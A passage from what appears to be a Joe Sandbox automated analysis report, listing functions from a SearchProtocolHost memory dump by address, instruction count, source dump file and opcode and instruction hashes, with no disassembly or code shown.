                                                                                      • Opcode Fuzzy Hash: a4aed3851d9d32bb957d5ff8239256a1e51a5b6f93e050910f15e3c5df9e3065
                                                                                      • Instruction Fuzzy Hash: AF015274A00348EFDB04EFA9D845EAEB7F8EF84704F04446AB900EF280D674DA01CB95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037CD0F0 Relevance: .0, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6e905e72580299d3ff224864fab82429879ab6b6a98a0ce6375e50d02db9b367
                                                                                      • Instruction ID: 356e0229fab2ee68d3f3f1a2f55084726f61977eac7f9a58bfb95c385528a64f
                                                                                      • Opcode Fuzzy Hash: 6e905e72580299d3ff224864fab82429879ab6b6a98a0ce6375e50d02db9b367
                                                                                      • Instruction Fuzzy Hash: 2801F736620684ABDB21EA58CC08F69B3AADBC4B64F1541ADEE158F280EB74D940C791
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0384F607 Relevance: .0, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 82032f81fbb1f14f6de038754549373487053efdda65c08403f6bb46cbe04c38
                                                                                      • Instruction ID: a9bff5f98842a57bfef51b52b8237f07db6dad7b6a34bc2a6c6e158c0115eeea
                                                                                      • Opcode Fuzzy Hash: 82032f81fbb1f14f6de038754549373487053efdda65c08403f6bb46cbe04c38
                                                                                      • Instruction Fuzzy Hash: EE015275A01308AFD704DFA9D845EAEB7F8EF84714F04446AB901EB380D674DA01CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0384F582 Relevance: .0, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0302e6f7478539844c7387060b12068a544d675c915a6870b16032e823f7b563
                                                                                      • Instruction ID: a4bcdfa38963dce138e0883687a304b8b5a9f4e42c485d6723a671df911b4ea0
                                                                                      • Opcode Fuzzy Hash: 0302e6f7478539844c7387060b12068a544d675c915a6870b16032e823f7b563
                                                                                      • Instruction Fuzzy Hash: 7A015275A01308ABDB14DFA9D845EAEBBF8EF84714F04446AB904EB280DA74DA01CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0378821B Relevance: .0, Instructions: 46COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3e3230df57c6da76f2173769313b1daffa54fd83edc72cbc61ab580713533da3
                                                                                      • Instruction ID: ad6c62eb9eff6bf5c54fcc538d1f106d35cec251399da55208b6366d90f8790b
                                                                                      • Opcode Fuzzy Hash: 3e3230df57c6da76f2173769313b1daffa54fd83edc72cbc61ab580713533da3
                                                                                      • Instruction Fuzzy Hash: 5201A739740608EBC714FFAAD8149AEB7BDFF84610B4840A9D901E7144DF70DD05C752
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037C415F Relevance: .0, Instructions: 46COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4d1a92b61cd8d28dfbaaee206516284c5664f828b4946346c73c54957677463c
                                                                                      • Instruction ID: ddf83f1caa36b1927683e54b0ff4523611e4108b44037ea86d2bf068d87f1306
                                                                                      • Opcode Fuzzy Hash: 4d1a92b61cd8d28dfbaaee206516284c5664f828b4946346c73c54957677463c
                                                                                      • Instruction Fuzzy Hash: 220126761502419BC726CF7F8A2C961FBE8FB9D31870C05ADE448C3B55D232E901C710
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0384F38A Relevance: .0, Instructions: 45COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4fc5c1e8fbaa67256a262094b359e00e56ba2975c461bc2172e0287ebd9e3ce3
                                                                                      • Instruction ID: 50dbd1130436017b2122149058b2c3f78b777ecc4e33f04d40fa8c1f3a99f062
                                                                                      • Opcode Fuzzy Hash: 4fc5c1e8fbaa67256a262094b359e00e56ba2975c461bc2172e0287ebd9e3ce3
                                                                                      • Instruction Fuzzy Hash: BF018475A00318EBD710EBA9D849FAEB7B8EF84704F04446AF501EF280D674D901CB94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 038592AB Relevance: .0, Instructions: 44COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                                                      • Instruction ID: e55596d33dfde9271844e2881c656f44701300612e66d90dcfe3f6a49795b747
                                                                                      • Opcode Fuzzy Hash: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                                                      • Instruction Fuzzy Hash: 2111A5B1A106219FDB88CF2DC0C0651BBE8FB88350B0582AAED18CB74AD374E915CF94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 038651B6 Relevance: .0, Instructions: 44COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bebad6c657cfda43955fe542a6b432aa7c0b9917e76f3027542dd08c043001b2
                                                                                      • Instruction ID: 79566f3fa31d51e3713b3211aa47ebefc2a59ce367a83b953dadddda6aa1f85c
                                                                                      • Opcode Fuzzy Hash: bebad6c657cfda43955fe542a6b432aa7c0b9917e76f3027542dd08c043001b2
                                                                                      • Instruction Fuzzy Hash: DF116D78E10259EFCB04DFA9D444A9EB7B4EF48704F14849AB915EB381E634DA02CB54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0378C2B0 Relevance: .0, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f9429900c64a47a2e9c2ca5d52e6d9bd748c69c7f3c99ecb53a8a2d053acaf1b
                                                                                      • Instruction ID: 3e9b5cd7c6e822eabcd4f82f197bc8ea379be7758b0ba7266cb83963fb1f4d68
                                                                                      • Opcode Fuzzy Hash: f9429900c64a47a2e9c2ca5d52e6d9bd748c69c7f3c99ecb53a8a2d053acaf1b
                                                                                      • Instruction Fuzzy Hash: D9F0FC372C06239BD333F7D94844B17F59E9FC5A60F190075E505BF690CA608C0196F4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 038650B7 Relevance: .0, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 800710a873b5a210638a33d9a0cfa4af3738c586a86a49b3d78ee0845436ac52
                                                                                      • Instruction ID: 8227b05c105137e0ff2887267109b6a2db288f0c052e86b436b3b79aced7c8ad
                                                                                      • Opcode Fuzzy Hash: 800710a873b5a210638a33d9a0cfa4af3738c586a86a49b3d78ee0845436ac52
                                                                                      • Instruction Fuzzy Hash: A2111774A00249DFDB04DFA9D845BAEFBF4BF08304F1442AAE518EB382E634D941CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037C5654 Relevance: .0, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                                      • Instruction ID: c12b784847be4a4b73892067780b11c12667483cda378c46bdb65d1b37ec4378
                                                                                      • Opcode Fuzzy Hash: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                                      • Instruction Fuzzy Hash: 3EF0FF72A11614AFE319CF5CC840F5AF7ECEB46B20F09406DE500EB220E672EE04CA94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0384F30A Relevance: .0, Instructions: 42COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 81a5bf94c2d64f3d5e86208815e9e080365fcf449fc438c91a9690ba74f05868
                                                                                      • Instruction ID: 8b812b02ddbe8acc0075ccd34567642968b016c790fee80fadb755c9adee6203
                                                                                      • Opcode Fuzzy Hash: 81a5bf94c2d64f3d5e86208815e9e080365fcf449fc438c91a9690ba74f05868
                                                                                      • Instruction Fuzzy Hash: A201E9B4E0070DAFDB14DFA9D545AAEB7F4AF48704F1084A9A955EB381E674DA00CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037C716D Relevance: .0, Instructions: 40COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d9094b8c0e0c6258773a4d94f691f5c07bcccd706a453715036b0034c324f6df
                                                                                      • Instruction ID: e96696c60553789b1020f664fb9db501f969df70f555a65a6846b75934807847
                                                                                      • Opcode Fuzzy Hash: d9094b8c0e0c6258773a4d94f691f5c07bcccd706a453715036b0034c324f6df
                                                                                      • Instruction Fuzzy Hash: 53F0FC75A153D46FEB18D7A68840FAEFBAC9FC5710F08459D9D01DB141DE30E941CA50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0381A130 Relevance: .0, Instructions: 40COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a7eb2c9c9bc746afa181101cc39ad93a35526fae3d57951b64d85f48a0169660
                                                                                      • Instruction ID: d7a5d095a98b5169b7c988fd2dc03d76267b411768ca9c82656d8c623188b2da
                                                                                      • Opcode Fuzzy Hash: a7eb2c9c9bc746afa181101cc39ad93a35526fae3d57951b64d85f48a0169660
                                                                                      • Instruction Fuzzy Hash: 41019A3A101159ABCF129F84DC40EDA7F6AFB4C754F058141FE19A6220C236D970EB80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0378C090 Relevance: .0, Instructions: 39COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 67623487f30edd80246a0339389bb72fb5cdc26e2835a36244833c909c35cbca
                                                                                      • Instruction ID: d4a62131401700dddc362a17a2e20adad088606b392a67f66a922d0fedac2db4
                                                                                      • Opcode Fuzzy Hash: 67623487f30edd80246a0339389bb72fb5cdc26e2835a36244833c909c35cbca
                                                                                      • Instruction Fuzzy Hash: 70F02B3268434E5BF325F705DC14B23F28AE7C0791F28406AEF058F1D5DA71DC018265
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 038632C9 Relevance: .0, Instructions: 38COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6204972ff3b380f720e05b2ecc519c88e41dbe2758d314eba0478bbef22976ee
                                                                                      • Instruction ID: ffa790a50ace2743bab1e8af9c224fb13f68232927afcf14d32b7cca3e5220f1
                                                                                      • Opcode Fuzzy Hash: 6204972ff3b380f720e05b2ecc519c88e41dbe2758d314eba0478bbef22976ee
                                                                                      • Instruction Fuzzy Hash: 8DF06276600748BFE711EBA4CD41FDAB7FCEB44714F044566B955EB190EAB0EA40CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0381C51D Relevance: .0, Instructions: 36COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2db14c0b86de1dd5ba2f06b80b14b26181eba4246c0035e72b28157b19e0b2f5
                                                                                      • Instruction ID: f22385bdb1ee5d06e6982735e2d96096337ad384dbecf1a9d71a37d853d2dbd1
                                                                                      • Opcode Fuzzy Hash: 2db14c0b86de1dd5ba2f06b80b14b26181eba4246c0035e72b28157b19e0b2f5
                                                                                      • Instruction Fuzzy Hash: EFF0A4742057049FC314EF68C445A1AB7F4FF88B04F404A5AB898DF395E634E900C756
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 03865149 Relevance: .0, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0331c0113ba81ae5a1d11ab446fc9e9ba5a6e5e3de6cd8fe5b64cc330e364147
                                                                                      • Instruction ID: 97785dc95525f0d2d61250898d8459482b691ce412f5d299a2737245d5c02983
                                                                                      • Opcode Fuzzy Hash: 0331c0113ba81ae5a1d11ab446fc9e9ba5a6e5e3de6cd8fe5b64cc330e364147
                                                                                      • Instruction Fuzzy Hash: CCF04F78A00208EFDB04EFA8D949A9EB7F4EF48304F1044A9B855EF381E674DA00CB54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0384F247 Relevance: .0, Instructions: 33COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2fa1c41097bf4c0f61427267c543b76290192e150df5166e619bc1d0b96f5d95
                                                                                      • Instruction ID: 788778d5176507f4177b15f248bf91e84c2774227a863f7c53de5e1d1a2dedf3
                                                                                      • Opcode Fuzzy Hash: 2fa1c41097bf4c0f61427267c543b76290192e150df5166e619bc1d0b96f5d95
                                                                                      • Instruction Fuzzy Hash: 49F06D78A00358EFDB04EFE9D409EAEB7F4AF48304F0044A9A501EB281EA74D900CB54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0379471B Relevance: .0, Instructions: 33COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 23dcc01aeac300e2bc0a32933a3abd8da6297c53e924868a8711ba9800917b3f
                                                                                      • Instruction ID: 72d367d58328bf7fcc94ef353648f2dc218effcfa291b7e49725326d7f5af351
                                                                                      • Opcode Fuzzy Hash: 23dcc01aeac300e2bc0a32933a3abd8da6297c53e924868a8711ba9800917b3f
                                                                                      • Instruction Fuzzy Hash: 52F0247140579C9EFF31C36AE804B71B7C89B03260F0C4BAFC4298F511D320D885C651
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D2539 Relevance: .0, Instructions: 31COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2ed3d22eeff636eb0551a0025a211ec4f1b1c67496731614af6a82ea339e5be1
                                                                                      • Instruction ID: 0245e172307661f88eb614a28cf36b8c35bd10f66bdf602cc07a8e3cdd88e64b
                                                                                      • Opcode Fuzzy Hash: 2ed3d22eeff636eb0551a0025a211ec4f1b1c67496731614af6a82ea339e5be1
                                                                                      • Instruction Fuzzy Hash: 7FE0D832340A406BD711EE59CCD8F47B7AEDFC2710F040479B9045F142C9E2DD0982A0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037CC50D Relevance: .0, Instructions: 31COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 28f1f3a559ec424f0fc7871a3ac06fd9085e134a774d2ffb1ca8f0d7a7afec10
                                                                                      • Instruction ID: 2302736b9497e9d1b7478303d6d85f47432e995132e60d89dbadcf9c860ecb60
                                                                                      • Opcode Fuzzy Hash: 28f1f3a559ec424f0fc7871a3ac06fd9085e134a774d2ffb1ca8f0d7a7afec10
                                                                                      • Instruction Fuzzy Hash: 07F0E2B5531AD29BD723D35CE048B61B7D89B05764F3D81ADE40ECB553C620D882C684
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0384F2AE Relevance: .0, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 56401bd02b7e8bef923ae7f4d2ce2461c0851c878609aeda2883f555630a3b00
                                                                                      • Instruction ID: e9213da8de9ee575bbf7fdd926cf21354e6d5d272e2761866b1b801d5631126a
                                                                                      • Opcode Fuzzy Hash: 56401bd02b7e8bef923ae7f4d2ce2461c0851c878609aeda2883f555630a3b00
                                                                                      • Instruction Fuzzy Hash: B8F08274A00648ABDB04EBF9D45AB5EB7F8EF48704F140498E601EF2C1D974D901CB18
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037C7128 Relevance: .0, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
